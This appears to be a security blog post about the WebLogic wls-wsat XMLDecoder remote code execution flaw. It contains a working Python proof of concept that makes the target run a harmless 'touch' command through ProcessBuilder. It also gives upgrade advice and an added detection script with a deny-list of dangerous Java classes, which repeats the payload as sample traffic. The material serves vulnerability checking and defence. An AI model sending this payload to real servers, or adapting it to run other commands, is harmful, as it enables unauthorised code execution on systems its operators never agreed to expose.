  • Weblogic wls RCE vulnerability verification PoC

    #!/usr/bin/env python3
    # coding:utf-8
    # @Date    : 2017/12/22 17:11
    # @File    : weblogic_poc.py
    # @Author  : sevck
    # @Link    : http://www.qingteng.cn
    #-------------------------------------------------------------------------
    # Verification PoC for the WebLogic wls-wsat XMLDecoder RCE: it POSTs a
    # SOAP request whose WorkContext header carries an XMLDecoder document
    # that runs `/bin/touch /tmp/weblogic` on the target, then inspects the
    # SOAP fault the server sends back to decide whether the payload was
    # evaluated. (Ported from Python 2 to Python 3; behaviour unchanged.)
    import re
    import sys

    import requests
    import urllib3

    # The request is sent with certificate verification disabled; silence the
    # resulting warning so the single result line stays readable.
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

    heads = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
        'Content-Type': 'text/xml;charset=UTF-8'
        }


    def poc(url):
        if not url.startswith("http"):
            url = "http://" + url
        # Tolerate a trailing slash on the supplied base URL so the endpoint
        # path is not doubled ("//wls-wsat/...").
        url = url.rstrip("/") + '/wls-wsat/CoordinatorPortType'
        post_str = '''
        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
          <soapenv:Header>
            <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
              <java>
                <void class="java.lang.ProcessBuilder">
                  <array class="java.lang.String" length="2">
                    <void index="0">
                      <string>/bin/touch</string>
                    </void>
                    <void index="1">
                      <string>/tmp/weblogic</string>
                    </void>
                  </array>
                  <void method="start"/>
                </void>
              </java>
            </work:WorkContext>
          </soapenv:Header>
          <soapenv:Body/>
        </soapenv:Envelope>
        '''

        try:
            response = requests.post(url, data=post_str, verify=False, timeout=5, headers=heads)
            response = response.text
            # Only the <faultstring> element of the SOAP fault is examined.
            response = re.search(r"<faultstring>.*</faultstring>", response).group(0)
        except Exception:
            # Connection errors, timeouts and responses without a <faultstring>
            # all land here and are reported as "No Vulnerability".
            response = ""

        # A vulnerable server evaluates the XMLDecoder document and echoes the
        # resulting ProcessBuilder (or, on some versions, "0") in the fault.
        if '<faultstring>java.lang.ProcessBuilder' in response or "<faultstring>0" in response:
            return "Vulnerability"
        return "No Vulnerability"


    if __name__ == '__main__':
        if len(sys.argv) == 1:
            print("python weblogic_poc.py url:port")
            sys.exit(0)
        print(poc(url=sys.argv[1]))

    A few words on remediation:

    My personal advice is to just update to the latest version; the old versions simply have too many problems. While chatting with Master Liao last night I was told that another WebLogic RCE has been submitted; it already has a CVE assigned and is just waiting for publication.
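Until the upgrade above can be rolled out, the defensive counterpart to the PoC is to recognise its payload shape on the wire: a `<java>` XMLDecoder document nested inside the `WorkContext` SOAP header, instantiating classes such as `java.lang.ProcessBuilder`. The following is an added example written for this page (not code from the original post or from sevck), showing a request-inspection routine a WAF rule or log-replay script could run over captured POST bodies. The function names `inspect_body` and `classify_request`, the `DANGEROUS_CLASSES` list and the sample request bodies are all constructed for this example; it generalises the PoC's single `ProcessBuilder` payload to the other XMLDecoder gadget classes commonly seen, and also handles the malformed-XML case:

```python
#!/usr/bin/env python3
"""Detect XMLDecoder payloads in SOAP WorkContext headers (wls-wsat RCE style).

Added example for this page, not part of the original PoC. Sample request
bodies at the bottom are constructed for this example.
"""
import re
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
WORKAREA_NS = "http://bea.com/2004/06/soap/workarea/"

# Classes that have no business being instantiated from a WorkContext header
# (assumed deny-list for this example; extend as needed).
DANGEROUS_CLASSES = {
    "java.lang.ProcessBuilder",
    "java.lang.Runtime",
    "java.io.PrintWriter",
    "java.io.FileOutputStream",
    "java.lang.Thread",
}

WLS_WSAT_PATH = re.compile(r"^/wls-wsat/", re.IGNORECASE)


def inspect_body(body):
    """Return a list of reasons the body looks like an XMLDecoder attack.

    An empty list means nothing suspicious was found.
    """
    reasons = []
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        # Malformed XML never reaches XMLDecoder, but a truncated or mangled
        # probe is still worth logging rather than silently dropping.
        if re.search(r"<java\b", body) or "WorkContext" in body:
            reasons.append("unparsable XML containing XMLDecoder/WorkContext markers")
        return reasons

    header = root.find("{%s}Header" % SOAP_NS)
    if header is None:
        return reasons

    for ctx in header.iter("{%s}WorkContext" % WORKAREA_NS):
        # <java> (no namespace) is the root of an XMLDecoder document.
        for java_el in ctx.iter("java"):
            reasons.append("XMLDecoder <java> document inside WorkContext header")
            for el in java_el.iter():
                cls = el.get("class")
                if cls in DANGEROUS_CLASSES:
                    reasons.append("instantiates %s" % cls)
                if el.get("method") in ("start", "exec"):
                    reasons.append("invokes method %s" % el.get("method"))
    return reasons


def classify_request(method, path, body):
    """Classify one captured request as ('block'|'watch'|'allow', reasons)."""
    reasons = inspect_body(body) if method.upper() == "POST" else []
    if reasons:
        return "block", reasons
    if WLS_WSAT_PATH.match(path):
        # Any traffic to the wls-wsat endpoints is unusual on most deployments.
        return "watch", ["request to wls-wsat endpoint"]
    return "allow", []


# --- Constructed sample traffic for this example ---------------------------
ATTACK_BODY = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java>
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="2">
            <void index="0"><string>/bin/touch</string></void>
            <void index="1"><string>/tmp/weblogic</string></void>
          </array>
          <void method="start"/>
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>"""

BENIGN_BODY = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header/>
  <soapenv:Body><ns:ping xmlns:ns="urn:example"/></soapenv:Body>
</soapenv:Envelope>"""

TRUNCATED_BODY = ATTACK_BODY[:200]  # a probe cut off mid-stream

if __name__ == "__main__":
    for label, path, body in [("attack", "/wls-wsat/CoordinatorPortType", ATTACK_BODY),
                              ("benign", "/wls-wsat/CoordinatorPortType", BENIGN_BODY),
                              ("truncated", "/wls-wsat/RegistrationPortTypeRPC", TRUNCATED_BODY)]:
        print(label, classify_request("POST", path, body))
```

The check is keyed on structure (an XMLDecoder document inside the WorkContext header) rather than on the literal `/bin/touch` string, so trivially re-encoded payloads that swap the command or the gadget class are still caught, while ordinary SOAP calls to the same endpoint are only flagged for review.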

  • Original article: https://www.cnblogs.com/sevck/p/8092760.html